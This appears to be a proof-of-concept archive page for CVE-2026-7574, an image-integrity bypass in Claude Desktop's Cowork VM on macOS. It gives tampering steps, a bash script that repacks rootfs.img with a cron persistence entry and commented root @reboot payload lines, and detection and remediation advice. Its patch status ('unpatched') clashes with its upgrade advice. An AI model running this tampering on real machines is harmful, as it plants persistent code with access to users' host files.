PoC Archive PoC Archive
High CVE-2026-7574 unpatched

Claude Desktop Cowork VM Image Integrity Bypass / Local Persistence (CVE-2026-7574)

by Ashraf Zaryouh / 0xBlackash (Recon 2026) · 2026-06-30

CVSS 8.7/10
Severity
High
CVE
CVE-2026-7574
Category
binary
Affected product
Anthropic Claude Desktop — Cowork feature
Affected versions
v1.1348.0 through v1.2278.0 (macOS)
Disclosed
2026-06-30
Patch status
unpatched

Metadata

FieldValue
Date Added2026-06-30
Last Updated2026-06-30
Author / ResearcherAshraf Zaryouh / 0xBlackash (Recon 2026)
CVE / AdvisoryCVE-2026-7574
Categorybinary
SeverityHigh
CVSS Score8.7 (CVSSv3.1; AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L)
StatusPoC
TagsLPE, persistence, VM-integrity, rootfs, Claude, AI-application, macOS, ext4, integrity-bypass, Shell
RelatedN/A

Affected Target

FieldValue
Software / SystemAnthropic Claude Desktop — Cowork feature
Versions Affectedv1.1348.0 through v1.2278.0 (macOS)
Language / PlatformBash (PoC); macOS (target)
Authentication RequiredYes (local unprivileged macOS user)
Network Access RequiredNo (local only)

Summary

CVE-2026-7574 is a VM image integrity bypass in Anthropic’s Claude Desktop Cowork feature (macOS). Before booting the Cowork virtual machine, the application validates only the presence of rootfs.img and its associated version marker (.rootfs.img.origin); it performs no cryptographic hash or signature verification on the image contents. A local attacker with standard macOS user privileges can extract the ext4 VM filesystem, inject arbitrary payloads (cron scripts, startup modifications, persistence mechanisms), repack the image, and place it back. On every subsequent Cowork launch the tampered image boots and executes attacker code inside the VM — including in host-mounted directories. The persistence survives application restarts and updates. Presented at Recon 2026.


Vulnerability Details

Root Cause

Claude Desktop Cowork stores its VM disk image at:

~/Library/Application Support/Claude/vm_bundles/claudevm.bundle/rootfs.img

Before launching the VM, the application checks:

  1. That rootfs.img exists.
  2. That .rootfs.img.origin version marker is present.

No SHA-256 or other cryptographic hash is computed against the image contents. No code signature is verified. Any file that passes the existence check is trusted and booted.

CWE-353 (Missing Support for Integrity Check).

Attack Steps

  1. Locate rootfs.img at ~/Library/Application Support/Claude/vm_bundles/claudevm.bundle/rootfs.img.
  2. Extract the ext4 partition:
    1
    
    dd if=rootfs.img of=partition.img bs=512 skip=206848 count=20764639
    
  3. Mount the ext4 partition to a temporary directory:
    1
    
    sudo mount -o loop partition.img /mnt/vm
    
  4. Inject malicious payload (e.g., cron job, startup script, backdoor binary).
  5. Unmount and write modified partition back into rootfs.img.
  6. Restart Claude Desktop Cowork — tampered image boots.

Impact

  • Arbitrary code execution inside the Cowork VM on every launch.
  • Access to host-mounted directories shared with the VM (files, credentials, project data).
  • Persistence survives application restarts and Claude Desktop updates.
  • Invisible to standard file-integrity tools monitoring the application bundle.
  • Scope is Changed (S:C): VM compromise extends to host-mounted paths.

Environment / Lab Setup

OS:       macOS (any version running affected Claude Desktop Cowork)
Tools:    dd, mount, standard shell utilities
Privs:    Local unprivileged macOS user account

Proof of Concept

Run

1
2
3
git clone https://github.com/0xBlackash/CVE-2026-7574
cd CVE-2026-7574
bash CVE-2026-7574.sh

The PoC:

  1. Extracts the ext4 partition from rootfs.img.
  2. Mounts it and writes /etc/0xblackash-poc.txt and a cron-based persistence entry (/etc/cron.d/blackash-poc).
  3. Repacks the image.
  4. On next Cowork launch, /etc/0xblackash-poc.txt will contain a timestamped proof marker.

Verification

1
cat /etc/0xblackash-poc.txt

Detection & Indicators of Compromise

1
2
3
4
5
6
7
stat ~/Library/Application\ Support/Claude/vm_bundles/claudevm.bundle/rootfs.img

sha256sum ~/Library/Application\ Support/Claude/vm_bundles/claudevm.bundle/rootfs.img

find ~/Library/Application\ Support/Claude/vm_bundles/ -newer /Applications/Claude.app -type f

log stream --predicate 'process == "Claude"' --info | grep -i "rootfs\|vm_bundle"

Remediation

ActionDetail
PatchUpgrade Claude Desktop to v1.2279.0 or later (versions above v1.2278.0 unaffected)
VerifyAfter patching, validate that Anthropic implemented SHA-256 or codesigning on rootfs.img at launch time
InterimRestrict file-system write access to ~/Library/Application Support/Claude/vm_bundles/ via macOS permissions

References

CVE-2026-7574.sh
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/bin/bash
# CVE-2026-7574 PoC
# Author: Ashraf Zaryouh (@0xBlackash)
# GitHub: https://github.com/0xBlackash
# Target: Anthropic Claude Desktop Cowork VM (macOS)
# Date: June 2026
# Description: Demonstrates rootfs.img tampering leading to persistent code execution inside the VM

set -euo pipefail

echo "=== CVE-2026-7574 PoC - 0xBlackash ==="

IMG="$HOME/Library/Application Support/Claude/vm_bundles/claudevm.bundle/rootfs.img"
BACKUP="${IMG}.bak.$(date +%s)"
PARTITION="/tmp/rootfs.ext4"
MNT="/tmp/cve-7574-mnt"

if [ ! -f "$IMG" ]; then
    echo "❌ rootfs.img not found. Run Cowork mode in Claude Desktop first to download the bundle."
    exit 1
fi

echo "✅ Target image: $IMG ($(du -sh "$IMG" | awk '{print $1}'))"

# Backup (strongly recommended)
read -p "Create backup before modification? (y/N) " -n 1 -r
echo
if [[ $REPLY =~ ^[Yy]$ ]]; then
    echo "[+] Creating backup..."
    cp "$IMG" "$BACKUP"
    echo "   Backup: $BACKUP"
fi

# Extract ext4 partition (offsets based on public analysis - verify with gdisk/parted)
echo "[+] Extracting ext4 partition..."
dd if="$IMG" of="$PARTITION" bs=512 skip=206848 count=20764639 status=progress

# Mount and inject payload
echo "[+] Mounting filesystem..."
sudo mkdir -p "$MNT"
if sudo mount -o loop "$PARTITION" "$MNT" 2>/dev/null; then
    echo "   Mounted successfully"
    
    # Harmless canary for demonstration
    echo "0xBlackash was here - CVE-2026-7574 PoC | $(date)" | sudo tee "$MNT/etc/0xblackash-poc.txt" >/dev/null
    echo "   [+] Injected proof-of-concept canary"
    
    # Example: Persistent marker (harmless)
    echo "# 0xBlackash CVE-2026-7574" | sudo tee -a "$MNT/etc/cron.d/blackash-poc" >/dev/null
    
    # Optional: More advanced payload examples (commented)
    # sudo cp /path/to/payload.sh "$MNT/usr/local/bin/"
    # echo "@reboot root /usr/local/bin/payload.sh" | sudo tee "$MNT/etc/crontab"
    
    sudo umount "$MNT"
    echo "   Unmounted"
else
    echo "❌ Failed to mount. Use Linux environment with ext4 support (or install macFUSE + ext4 tools)."
    exit 1
fi

# Reinsert modified partition
echo "[+] Reinserting modified partition..."
dd if="$PARTITION" of="$IMG" bs=512 seek=206848 conv=notrunc status=progress

echo "✅ PoC completed successfully!"
echo ""
echo "Verification steps:"
echo "1. Launch Claude Desktop and start Cowork VM"
echo "2. Inside the VM, run: cat /etc/0xblackash-poc.txt"
echo "3. Changes persist across VM restarts (no re-download triggered)"
echo ""
echo "The VM boots normally because only file presence + .rootfs.img.origin marker is checked — no content integrity verification."

# Cleanup
rm -f "$PARTITION"
sudo rm -rf "$MNT"